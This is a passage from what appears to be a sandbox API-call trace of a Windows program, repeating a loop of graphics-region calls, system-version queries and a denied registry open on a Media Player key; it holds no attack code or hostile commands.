returned 0x1100d7d [0017.789] DeleteObject (ho=0x1100d7d) returned 1 [0017.789] DeleteObject (ho=0x41040713) returned 1 [0017.789] DeleteObject (ho=0x3704027d) returned 1 [0017.789] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.789] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.789] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.789] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.789] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.789] BeginPath (hdc=0x0) returned 0 [0017.789] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.789] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.789] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.789] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.789] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.789] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.790] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.790] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.790] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x42040713 [0017.790] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3804027d [0017.790] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d7e [0017.790] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d7f [0017.790] CombineRgn (hrgnDst=0x1040d7e, hrgnSrc1=0x42040713, hrgnSrc2=0x3804027d, iMode=1) returned 1 [0017.790] CombineRgn (hrgnDst=0x1040d7f, hrgnSrc1=0x42040713, hrgnSrc2=0x3804027d, iMode=4) returned 2 [0017.790] CreateSolidBrush (color=0xff) returned 0x2100d7d [0017.790] CreateSolidBrush (color=0xff0000) returned 0x1100d80 [0017.790] DeleteObject (ho=0x1100d80) returned 1 [0017.790] DeleteObject (ho=0x3804027d) returned 1 [0017.790] DeleteObject (ho=0x42040713) returned 1 [0017.790] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.790] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.790] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.790] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.790] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.790] BeginPath (hdc=0x0) returned 0 [0017.790] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.790] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.790] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.790] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.790] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.790] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.790] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.791] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.791] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3904027d [0017.791] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x43040713 [0017.791] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d81 [0017.791] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d82 [0017.791] CombineRgn (hrgnDst=0x1040d81, hrgnSrc1=0x3904027d, hrgnSrc2=0x43040713, iMode=1) returned 1 [0017.791] CombineRgn (hrgnDst=0x1040d82, hrgnSrc1=0x3904027d, hrgnSrc2=0x43040713, iMode=4) returned 2 [0017.791] CreateSolidBrush (color=0xff) returned 0x2100d80 [0017.791] CreateSolidBrush (color=0xff0000) returned 0x1100d83 [0017.791] DeleteObject (ho=0x1100d83) returned 1 [0017.791] DeleteObject (ho=0x43040713) returned 1 [0017.791] DeleteObject (ho=0x3904027d) returned 1 [0017.791] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.791] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.791] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.791] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.791] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.791] BeginPath (hdc=0x0) returned 0 [0017.791] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.791] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.791] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.791] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.791] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.791] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.791] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.791] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.792] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x44040713 [0017.792] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3a04027d [0017.792] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d84 [0017.792] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d85 [0017.792] CombineRgn (hrgnDst=0x1040d84, hrgnSrc1=0x44040713, hrgnSrc2=0x3a04027d, iMode=1) returned 1 [0017.792] CombineRgn (hrgnDst=0x1040d85, hrgnSrc1=0x44040713, hrgnSrc2=0x3a04027d, iMode=4) returned 2 [0017.792] CreateSolidBrush (color=0xff) returned 0x2100d83 [0017.792] CreateSolidBrush (color=0xff0000) returned 0x1100d86 [0017.792] DeleteObject (ho=0x1100d86) returned 1 [0017.792] DeleteObject (ho=0x3a04027d) returned 1 [0017.792] DeleteObject (ho=0x44040713) returned 1 [0017.792] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.792] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.792] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.792] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.792] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.792] BeginPath (hdc=0x0) returned 0 [0017.792] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.792] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.792] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.792] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.792] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.792] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.792] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.792] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.793] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3b04027d [0017.793] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x45040713 [0017.793] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d87 [0017.793] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d88 [0017.793] CombineRgn (hrgnDst=0x1040d87, hrgnSrc1=0x3b04027d, hrgnSrc2=0x45040713, iMode=1) returned 1 [0017.793] CombineRgn (hrgnDst=0x1040d88, hrgnSrc1=0x3b04027d, hrgnSrc2=0x45040713, iMode=4) returned 2 [0017.793] CreateSolidBrush (color=0xff) returned 0x2100d86 [0017.793] CreateSolidBrush (color=0xff0000) returned 0x1100d89 [0017.793] DeleteObject (ho=0x1100d89) returned 1 [0017.793] DeleteObject (ho=0x45040713) returned 1 [0017.793] DeleteObject (ho=0x3b04027d) returned 1 [0017.793] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.793] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.793] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.793] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.793] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.793] BeginPath (hdc=0x0) returned 0 [0017.793] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.793] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.793] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.793] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.793] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.793] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.793] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.793] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.793] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x46040713 [0017.794] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3c04027d [0017.794] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d8a [0017.794] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d8b [0017.794] CombineRgn (hrgnDst=0x1040d8a, hrgnSrc1=0x46040713, hrgnSrc2=0x3c04027d, iMode=1) returned 1 [0017.794] CombineRgn (hrgnDst=0x1040d8b, hrgnSrc1=0x46040713, hrgnSrc2=0x3c04027d, iMode=4) returned 2 [0017.794] CreateSolidBrush (color=0xff) returned 0x2100d89 [0017.794] CreateSolidBrush (color=0xff0000) returned 0x1100d8c [0017.794] DeleteObject (ho=0x1100d8c) returned 1 [0017.794] DeleteObject (ho=0x3c04027d) returned 1 [0017.794] DeleteObject (ho=0x46040713) returned 1 [0017.794] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.794] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.794] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.794] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.794] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.794] BeginPath (hdc=0x0) returned 0 [0017.794] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.794] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.794] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.794] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.794] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.794] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.794] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.794] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.794] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3d04027d [0017.794] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x47040713 [0017.794] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d8d [0017.795] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d8e [0017.795] CombineRgn (hrgnDst=0x1040d8d, hrgnSrc1=0x3d04027d, hrgnSrc2=0x47040713, iMode=1) returned 1 [0017.795] CombineRgn (hrgnDst=0x1040d8e, hrgnSrc1=0x3d04027d, hrgnSrc2=0x47040713, iMode=4) returned 2 [0017.795] CreateSolidBrush (color=0xff) returned 0x2100d8c [0017.795] CreateSolidBrush (color=0xff0000) returned 0x1100d8f [0017.795] DeleteObject (ho=0x1100d8f) returned 1 [0017.795] DeleteObject (ho=0x47040713) returned 1 [0017.795] DeleteObject (ho=0x3d04027d) returned 1 [0017.795] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.795] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.795] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.795] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.795] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.795] BeginPath (hdc=0x0) returned 0 [0017.795] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.795] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.795] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.795] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.795] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.795] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.795] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.795] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.796] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x48040713 [0017.796] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3e04027d [0017.796] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d90 [0017.796] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d91 [0017.796] CombineRgn (hrgnDst=0x1040d90, hrgnSrc1=0x48040713, hrgnSrc2=0x3e04027d, iMode=1) returned 1 [0017.796] CombineRgn (hrgnDst=0x1040d91, hrgnSrc1=0x48040713, hrgnSrc2=0x3e04027d, iMode=4) returned 2 [0017.796] CreateSolidBrush (color=0xff) returned 0x2100d8f [0017.796] CreateSolidBrush (color=0xff0000) returned 0x1100d92 [0017.796] DeleteObject (ho=0x1100d92) returned 1 [0017.796] DeleteObject (ho=0x3e04027d) returned 1 [0017.796] DeleteObject (ho=0x48040713) returned 1 [0017.796] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.796] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.796] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.796] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.796] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.796] BeginPath (hdc=0x0) returned 0 [0017.796] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.796] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.796] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.796] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.796] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.796] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.796] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.796] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.796] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3f04027d [0017.796] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x49040713 [0017.796] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d93 [0017.796] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d94 [0017.797] CombineRgn (hrgnDst=0x1040d93, hrgnSrc1=0x3f04027d, hrgnSrc2=0x49040713, iMode=1) returned 1 [0017.797] CombineRgn (hrgnDst=0x1040d94, hrgnSrc1=0x3f04027d, hrgnSrc2=0x49040713, iMode=4) returned 2 [0017.797] CreateSolidBrush (color=0xff) returned 0x2100d92 [0017.797] CreateSolidBrush (color=0xff0000) returned 0x1100d95 [0017.797] DeleteObject (ho=0x1100d95) returned 1 [0017.797] DeleteObject (ho=0x49040713) returned 1 [0017.797] DeleteObject (ho=0x3f04027d) returned 1 [0017.797] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.797] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.797] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.797] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.797] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.797] BeginPath (hdc=0x0) returned 0 [0017.797] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.797] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.797] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.797] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.797] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.797] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.797] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.797] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.797] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4a040713 [0017.797] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4004027d [0017.797] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d96 [0017.797] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d97 [0017.797] CombineRgn (hrgnDst=0x1040d96, hrgnSrc1=0x4a040713, hrgnSrc2=0x4004027d, iMode=1) returned 1 [0017.797] CombineRgn (hrgnDst=0x1040d97, hrgnSrc1=0x4a040713, hrgnSrc2=0x4004027d, iMode=4) returned 2 [0017.797] CreateSolidBrush (color=0xff) returned 0x2100d95 [0017.797] CreateSolidBrush (color=0xff0000) returned 0x1100d98 [0017.798] DeleteObject (ho=0x1100d98) returned 1 [0017.798] DeleteObject (ho=0x4004027d) returned 1 [0017.798] DeleteObject (ho=0x4a040713) returned 1 [0017.798] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.798] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.798] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.798] SelectObject 